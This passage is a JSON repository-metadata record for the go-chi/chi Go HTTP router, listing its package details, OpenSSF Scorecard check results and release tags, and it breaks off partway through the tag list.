{"id":378168,"url":"https://github.com/go-chi/chi","last_synced_at":"2026-08-13T02:32:36.354Z","repository":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"owner":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"packages":[{"id":3494041,"name":"github.com/go-chi/chi","ecosystem":"go","description":"Package chi is a small, idiomatic and composable router for building HTTP services.","homepage":"https://github.com/go-chi/chi","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/go-chi/chi","keywords_array":[],"namespace":"github.com/go-chi","versions_count":33,"first_release_published_at":"2016-03-31T13:51:57.000Z","latest_release_published_at":"2026-08-11T08:00:33.062Z","latest_release_number":null,"last_synced_at":"2026-08-11T08:00:33.614Z","created_at":"2022-04-10T19:21:23.936Z","updated_at":"2026-08-11T08:00:33.615Z","registry_url":"https://pkg.go.dev/github.com/go-chi/chi","install_command":"go get github.com/go-chi/chi","documentation_url":"https://pkg.go.dev/github.com/go-chi/chi#section-documentation","metadata":{},"repo_metadata":{"id":37431049,"uuid":"44344606","full_name":"go-chi/chi","owner":"go-chi","description":"lightweight, idiomatic and composable router for building Go HTTP services","archived":false,"fork":false,"pushed_at":"2026-07-06T14:32:43.000Z","size":3855,"stargazers_count":22647,"open_issues_count":113,"forks_count":1143,"subscribers_count":202,"default_branch":"master","last_synced_at":"2026-08-08T05:52:46.865Z","etag":null,"topics":["api","context","go","golang","http","microservices","middleware","rest-api","router"],"latest_commit_sha":null,"homepage":"https://go-chi.io","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/go-chi.png","metadata":{"files":{"readme":"README.md","changelog":"CHANGELOG.md","contributing":"CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":null,"dco":null,"cla":null},"funding":{"github":["pkieltyka"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-10-15T20:46:29.000Z","updated_at":"2026-08-08T05:10:38.000Z","dependencies_parsed_at":"2024-02-17T01:25:55.324Z","dependency_job_id":"9318de72-9c7f-4385-92f6-00246e08d3a4","html_url":"https://github.com/go-chi/chi","commit_stats":{"total_commits":679,"total_committers":142,"mean_commits":4.78169014084507,"dds":0.6244477172312224,"last_synced_commit":"ef31c0bff3f8061e6fba7085691e4970a3d1b7da"},"previous_names":["pressly/chi"],"tags_count":59,"template":false,"template_full_name":null,"purl":"pkg:github/go-chi/chi","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/refs/heads/master","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/sbom","scorecard":{"id":431500,"data":{"date":"2025-08-11","repo":{"name":"github.com/go-chi/chi","commit":"23c395f8524a30334126ca16fb4d37b88745b9b9"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":5.7,"checks":[{"name":"Code-Review","score":8,"reason":"Found 25/30 approved changesets -- score normalized to 8","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Maintained","score":3,"reason":"4 commit(s) and 0 issue activity found in the last 90 days -- score normalized to 3","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":3,"reason":"dependency not pinned by hash detected -- score normalized to 3","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:30: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/ci.yml:36: update your workflow using https://app.stepsecurity.io/secureworkflow/go-chi/chi/ci.yml/master?enable=pin","Info:   0 out of   2 GitHub-owned GitHubAction dependencies pinned","Info:   1 out of   1 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"Vulnerabilities","score":9,"reason":"1 existing vulnerabilities detected","details":["Warn: Project is vulnerable to: GO-2025-3770 / GHSA-vrw8-fxc6-2r93"],"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 29 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}}]},"last_synced_at":"2025-08-19T03:27:31.106Z","repository_id":37431049,"created_at":"2025-08-19T03:27:31.106Z","updated_at":"2025-08-19T03:27:31.106Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36403979,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-08T02:00:08.763Z","response_time":96,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"go-chi","name":"go-chi","uuid":"29575368","kind":"organization","description":"","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/29575368?v=4","repositories_count":17,"last_synced_at":"2023-02-26T15:55:10.593Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/go-chi","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-10T02:33:16.133Z","updated_at":"2023-02-26T15:55:10.598Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/go-chi/repositories"},"tags":[{"name":"v5.3.1","sha":"8b258c7bb28f97a5f2a856ff7ef962578fec9215","kind":"commit","published_at":"2026-07-05T18:51:45.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.1/manifests"},{"name":"v5.3.0","sha":"3b171578ca44dfd75ca3c5cbddc7b44c600a7b49","kind":"commit","published_at":"2026-05-22T15:16:13.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.3.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.3.0/manifests"},{"name":"v5.2.5","sha":"05f1ef7bb50b8a8cb33a9dd3ba1c5b94bff0f723","kind":"commit","published_at":"2026-02-05T11:05:34.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.5","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.5/manifests"},{"name":"v5.2.4","sha":"6eb35881c0e438ffb663ddbad3a61babaa5e5d8a","kind":"commit","published_at":"2026-01-14T16:02:00.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.4","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.4/manifests"},{"name":"v5.2.3","sha":"9b9fb55def404397748a9fc7e044efe9db1d618e","kind":"commit","published_at":"2025-08-26T17:56:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.3","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.3/manifests"},{"name":"v5.2.2","sha":"23c395f8524a30334126ca16fb4d37b88745b9b9","kind":"commit","published_at":"2025-06-20T12:21:10.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.2","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.2/manifests"},{"name":"v5.2.1","sha":"71307f9b7e4e9527638bc951c42b782cd1560331","kind":"commit","published_at":"2025-01-20T20:41:44.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.1","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.1/manifests"},{"name":"v5.2.0","sha":"0a20a0e3400e551803f463d17a0ab84ee8afef3c","kind":"commit","published_at":"2024-12-14T17:06:53.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.2.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.2.0/manifests"},{"name":"v5.1.0","sha":"67be7d9cafdaeb4e04e887ff78d09e030ee43b00","kind":"commit","published_at":"2024-06-28T14:29:27.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.1.0","html_url":"https://github.com/go-chi/chi/releases/tag/v5.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.1.0/manifests"},{"name":"v5.0.14","sha":"7957c0d4ddaee560a01110145dbf2809ffdb6663","kind":"commit","published_at":"2024-06-21T12:30:42.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.14","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.14/manifests"},{"name":"v5.0.13","sha":"f10dc4a9cab53a47f600f518fcccaa044666e95f","kind":"commit","published_at":"2024-06-07T23:13:37.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.13","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.13/manifests"},{"name":"v5.0.12","sha":"1191921289e82fdc56f298a76ff254742f568ece","kind":"commit","published_at":"2024-02-17T00:24:11.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.12","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.12/manifests"},{"name":"v5.0.11","sha":"fcdb1329609a395afb1dac4c5f2bc777b35f0f17","kind":"commit","published_at":"2023-12-20T02:35:01.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v5.0.11","html_url":"https://github.com/go-chi/chi/releases/tag/v5.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v5.0.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v5.0.11/manifests"},{"name":"v4.1.3","sha":"da7ce9468546b9c352b0c7eac3580961543d0d96","kind":"commit","published_at":"2023-09-07T09:47:57.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v4.1.3","html_url":"https://github.com/go-chi/chi/releases/tag/v4.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v4.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v4.1.3/manifests"},{"name":"v3.3.5","sha":"8f7c7827792ffe0506ef6bf0d2e85d1ddfd89a20","kind":"commit","published_at":"2023-09-07T09:46:43.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v3.3.5","html_url":"https://github.com/go-chi/chi/releases/tag/v3.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/go-chi/chi@v3.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/go-chi%2Fchi/tags/v3.3.5/manifests"},{"name":"v2.1.1","sha":"052d563ff595f7c360284be323a8ef4c41e1d761","kind":"commit","published_at":"2023-09-07T09:44:41.000Z","download_url":"https://codeload.github.com/go-chi/chi/tar.gz/v2.1.1","html_url":"https://github.com/go-chi/chi/releases/tag/v2.1.1","dependencies_parsed_at":null,"